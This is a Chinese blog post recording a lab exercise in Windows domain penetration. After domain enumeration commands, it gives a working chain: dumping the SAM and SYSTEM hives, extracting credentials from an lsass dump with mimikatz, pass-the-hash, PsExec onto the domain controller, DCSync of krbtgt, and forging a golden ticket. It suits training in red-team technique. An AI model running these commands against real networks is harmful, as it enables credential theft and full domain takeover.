<!DOCTYPE html><html lang="zh-CN/zn" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>域渗透(靶场) | 秋兮成風</title><meta name="description" content="当获取内网中某一台主机的权限之后，需要进行域渗透，记录一下，靶场练习 信息收集域环境信息ipconfig &#x2F;all 查询域控ip 使用Ps提权，查询域用户信息PsExec.exe -i -d -s cmd 现在为系统权限，接着查询域用户信息域用户列表：net user &#x2F;domain 域管理员：net group &quot;domain admins&quot; &#x2F;domain 查看域控制器有几"><meta name="keywords" content="内网渗透"><meta name="author" content="秋兮成風"><meta name="copyright" content="秋兮成風"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/tubiao.png"><link rel="canonical" href="http://yoursite.com/2020/06/27/%E5%9F%9F%E6%B8%97%E9%80%8F/"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//fonts.googleapis.com" crossorigin="crossorigin"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta property="og:type" content="article"><meta property="og:title" content="域渗透(靶场)"><meta property="og:url" content="http://yoursite.com/2020/06/27/%E5%9F%9F%E6%B8%97%E9%80%8F/"><meta property="og:site_name" content="秋兮成風"><meta property="og:description" content="当获取内网中某一台主机的权限之后，需要进行域渗透，记录一下，靶场练习 信息收集域环境信息ipconfig &#x2F;all 查询域控ip 使用Ps提权，查询域用户信息PsExec.exe -i -d -s cmd 现在为系统权限，接着查询域用户信息域用户列表：net user &#x2F;domain 域管理员：net group &quot;domain admins&quot; &#x2F;domain 查看域控制器有几"><meta property="og:image" content="http://yoursite.com/img/yushentou.jpg"><meta property="article:published_time" content="2020-06-27T02:59:41.000Z"><meta property="article:modified_time" content="2020-06-27T03:01:47.697Z"><meta name="twitter:card" content="summary"><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#000')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#fff')
  }
}

var getCookies = function (name) {
  const value = `; ${document.cookie}`
  const parts = value.split(`; ${name}=`)
  if (parts.length === 2) return parts.pop().split(';').shift()
}

var autoChangeMode = 'false'
var t = getCookies('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (Cookies.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="next" title="初识域渗透" href="http://yoursite.com/2020/06/23/SYSTEM%E5%9F%9F/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web&amp;display=swap"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  bookmark: {
    message_prev: 'Press',
    message_next: 'to bookmark this page'
  },
  runtime_unit: 'days',
  runtime: false,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: false,
  highlightCopy: true,
  highlightLang: true,
  isPhotoFigcaption: false,
  islazyload: true,
  isanchor: false    
}</script><script>var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: undefined,
  isSidebar: true
  }</script><noscript><style>
#nav {
  opacity: 1
}
.justified-gallery img{
  opacity: 1
}
</style></noscript><meta name="generator" content="Hexo 4.2.1"></head><body><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="spinner-box"><div class="configure-border-1"><div class="configure-core"></div></div><div class="configure-border-2"><div class="configure-core"></div></div><div class="loading-word">Loading...</div></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/touxiang.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">13</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">Tags</div><div class="length_num">8</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">Categories</div><div class="length_num">2</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down menus-expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#信息收集"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#域环境信息"><span class="toc-number">1.1.</span> <span class="toc-text">域环境信息</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#开始测试"><span class="toc-number">2.</span> <span class="toc-text">开始测试</span></a></li></ol></div></div></div><div id="body-wrap"><div id="web_bg" data-type="photo"></div><header class="post-bg" id="page-header" style="background-image: url(/img/yushentou.jpg)"><nav id="nav"><span class="pull-left" id="blog_name"><a class="blog_title" id="site-name" href="/">秋兮成風</a></span><span class="pull-right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down menus-expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><span class="toggle-menu close"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">域渗透(靶场)</div></div><div id="post-meta"><div class="meta-firstline"><time class="post-meta__date"><span class="post-meta__date-created" title="Created 2020-06-27 10:59:41"><i class="far fa-calendar-alt fa-fw"></i> Created 2020-06-27</span><span class="post-meta__separator">|</span><span class="post-meta__date-updated" title="Updated 2020-06-27 11:01:47"><i class="fas fa-history fa-fw"></i> Updated 2020-06-27</span></time><span class="post-meta__categories"><span class="post-meta__separator">|</span><i class="fas fa-inbox fa-fw post-meta__icon"></i><a class="post-meta__categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></span></div><div class="meta-secondline"> </div><div class="meta-thirdline"><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta__icon"></i><span>Post View:</span><span id="busuanzi_value_page_pv"></span></span><span class="post-meta-commentcount"></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><p><strong>当获取内网中某一台主机的权限之后，需要进行域渗透，记录一下，靶场练习</strong></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="域环境信息"><a href="#域环境信息" class="headerlink" title="域环境信息"></a>域环境信息</h3><p><code>ipconfig /all</code> 查询域控ip</p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/3e639393bc48f3ea75bb651646d513a6_86798.png" alt=""><br>使用Ps提权，查询域用户信息<br><code>PsExec.exe -i -d -s cmd</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/7b82c117db495237fc496a9e3c0499ef_60331.png" alt=""><br>现在为系统权限，接着查询域用户信息<br>域用户列表：<code>net user /domain</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/a8fcd5f8f9c12a765bb3e3a1627d4a1a_69327.png" alt=""><br>域管理员：<code>net group &quot;domain admins&quot; /domain</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/d5674e2057e6d0f3ba23c4cfd4da3818_28177.png" alt=""><br>查看域控制器有几台：<code>net group &quot;domain computers&quot; /domain</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/c7029732e67cdba099a0f5bdcc5b4a36_39338.png" alt=""><br>查看域中的服务器：<code>net group &quot;domain computers&quot; /domain</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/237ed8705ddf739857fc82063dc15e2b_34631.png" alt=""><br>查看域里面的组：<code>net group /domain</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/7aba51737f6c8e9a5674faf9d2afbe40_99645.png" alt=""><br>查看内网中存在多少个域：<code>net view /domain</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/a7ebb54b6e69a748ed19b49b1b9d1ae0_28406.png" alt=""><br>查看该域中的机器列表：<code>net view /domain:zkaq</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/af742736d7cc38ea986cbd743c213750_32240.png" alt=""><br>扫描域中存活的主机：<code>nbtscan.exe 10.0.1.8/24</code>（也可用来检测ARP欺骗）</p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/821d2bb91758dc76d2248e9ba0b269ce_76199.png" alt=""></p>
<h2 id="开始测试"><a href="#开始测试" class="headerlink" title="开始测试"></a>开始测试</h2><p>将注册表的信息导出，复制到本地<br><code>reg save HKLM\SYSTEM c:\Users\Administrator\Desktop\Sys.hiv</code><br><code>reg save HKLM\SAM c:\Users\Administrator\Desktop\Sam.hiv</code><br>利用mimikate，将内容读取出来</p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/3d200ded12ed985918be5e59a95f1c8f_83197.png" alt=""><br>内存中并没有太多的信息<br>读取lsass进程重的信息</p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/c5e76129b0c55989c4779bf1911049d4_45484.png" alt=""></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">sekurlsa::minidump lsass.dmp</span><br><span class="line">Log</span><br><span class="line">sekurlsa::logonpasswords</span><br></pre></td></tr></table></figure>

<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/b9bcb37e4dcdac737e4108eabde9dbe0_32115.png" alt=""><br>得到目标hash值，通过hash传递，登录目标机器<br><code>sekurlsa::pth /user:administrator /domain:&quot;zkaq.cn&quot; /ntlm:61465a991b168727b65b3644aab823cd</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/c2901ed0cfe292bd341e7912bebcb72f_39959.png" alt=""><br>既然可以查看域控主机的文件，那就让那边给我们反弹一个cmd过来<br><code>PsExec.exe \\10.0.1.6 cmd</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/7512407fc1ba10864f33d53442b4410b_83323.png" alt=""><br>现在拥有域控主机的管理员权限，就可以为所欲为了，创建一个用户</p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/d868b50e7cd51934d7b62c38b76b7cd6_50717.png" alt=""><br>虽然创建了用户，但还是不能用这个账号去登录其它的主机</p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/ae86e78101afdaf383c1c6337f8715f0_97827.png" alt=""><br>这是我们就需要去搞一张黄金票据过来<br>在域控主机上执行：<code>lsadump::dcsync /user:krbtgt</code></p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/60b26b697cbd2b72fc61ba7684615977_48725.png" alt=""><br>需要这两条数据，返回客户机<br><code>kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:administrator.kiribi</code><br>生成一个文件，这个文件就是黄金票据<br>加载这个票据<br><code>kerberos::ptt administrator.kiribi</code><br>票据加载成功</p>
<p><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/d48545296892bd08cc989852ac8763bd_37469.png" alt=""><br><img src= "/img/loading.gif" data-src="https://nc0.cdn.zkaq.cn/md/3330/e29ad51f26483acabbce39aaa1a68261_58546.png" alt=""><br>这样即使在一个普通的命令窗口，同样可以去访问域控主机的内容。</p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">秋兮成風</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://yoursite.com/2020/06/27/%E5%9F%9F%E6%B8%97%E9%80%8F/">http://yoursite.com/2020/06/27/%E5%9F%9F%E6%B8%97%E9%80%8F/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></div><div class="post_share"><div class="social-share" data-image="/img/yushentou.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"/><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><nav class="pagination-post" id="pagination"><div class="next-post pull-full"><a href="/2020/06/23/SYSTEM%E5%9F%9F/"><img class="next-cover" data-src="/img/systemyu.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">初识域渗透</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fas fa-thumbs-up fa-fw"></i><span> Related Articles</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2020/06/21/SYSTEM/" title="初识内网渗透"><img class="relatedPosts_cover" data-src="/img/system.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2020-06-21</div><div class="relatedPosts_title">初识内网渗透</div></div></a></div><div class="relatedPosts_item"><a href="/2020/06/23/SYSTEM域/" title="初识域渗透"><img class="relatedPosts_cover" data-src="/img/systemyu.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2020-06-23</div><div class="relatedPosts_title">初识域渗透</div></div></a></div></div></div></article></main><footer id="footer" style="background-image: url(/img/yushentou.jpg)" data-type="photo"><div id="footer-wrap"><div class="copyright">&copy;2020 By 秋兮成風</div><div class="framework-info"><span>Driven </span><a href="https://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><button id="readmode" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="font_plus" title="Increase Font Size"><i class="fas fa-plus"></i></button><button id="font_minus" title="Decrease Font Size"><i class="fas fa-minus"></i></button><button class="translate_chn_to_cht" id="translateLink" title="Switch Between Traditional Chinese And Simplified Chinese">繁</button><button id="darkmode" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="/js/third-party/activate-power-mode.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = true;
document.body.addEventListener('input', POWERMODE);
</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module" defer></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload/dist/lazyload.iife.min.js" async></script><script src="/js/third-party/click_heart.js"></script><script>var endLoading = function () {
  document.body.style.overflow = 'auto';
  document.getElementById('loading-box').classList.add("loaded")
}
window.addEventListener('load',endLoading)</script></body></html>